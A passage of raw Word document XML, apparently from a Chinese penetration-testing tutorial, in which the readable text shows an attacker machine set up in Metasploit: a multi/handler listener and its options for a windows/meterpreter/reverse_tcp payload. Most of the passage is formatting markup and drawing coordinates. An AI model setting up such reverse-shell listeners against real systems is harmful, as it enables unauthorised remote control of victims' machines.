        </w:rPr>
        <w:t>2003</w:t>
      </w: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342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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>置攻击机msf：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4911" w:firstLine="0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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5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msf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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>show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options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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5151" w:firstLine="0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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5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Module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options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989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/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multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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: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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33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Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4791" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="3830" w:firstLine="0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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4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Payload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options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989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/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meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/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reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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: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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33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Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>EXITFUNC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32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process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30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technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Accepted:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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seh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30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proce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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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ict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:329.891pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,6597">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:6597" coordorigin="10402,0" coordsize="0,6597" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,2,10402,3,10402,5,10402,6,10402,8,10402,10,10402,13,10402,16,10402,19,10402,22,10402,26,10402,31,10402,36,10402,41,10402,47,10402,54,10402,61,10402,68,10402,77,10402,85,10402,95,10402,105,10402,116,10402,128,10402,140,10402,153,10402,167,10402,182,10402,198,10402,214,10402,232,10402,250,10402,269,10402,290,10402,311,10402,333,10402,356,10402,381,10402,406,10402,432,10402,460,10402,489,10402,519,10402,550,10402,582,10402,616,10402,651,10402,687,10402,725,10402,763,10402,804,10402,845,10402,888,10402,933,10402,978,10402,1026,10402,1075,10402,1125,10402,1177,10402,1231,10402,1286,10402,1342,10402,1401,10402,1461,10402,1523,10402,1586,10402,1651,10402,1718,10402,1787,10402,1857,10402,1930,10402,2004,10402,2080,10402,2158,10402,2238,10402,2320,10402,2404,10402,2490,10402,2578,10402,2668,10402,2760,10402,2854,10402,2950,10402,3048,10402,3149,10402,3251,10402,3356,10402,3463,10402,3573,10402,3685,10402,3798,10402,3915,10402,4033,10402,4154,10402,4278,10402,4404,10402,4532,10402,4663,10402,4796,10402,4932,10402,5070,10402,5211,10402,5354,10402,5500,10402,5649,10402,5800,10402,5954,10402,6111,10402,6270,10402,6432,10402,6597e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3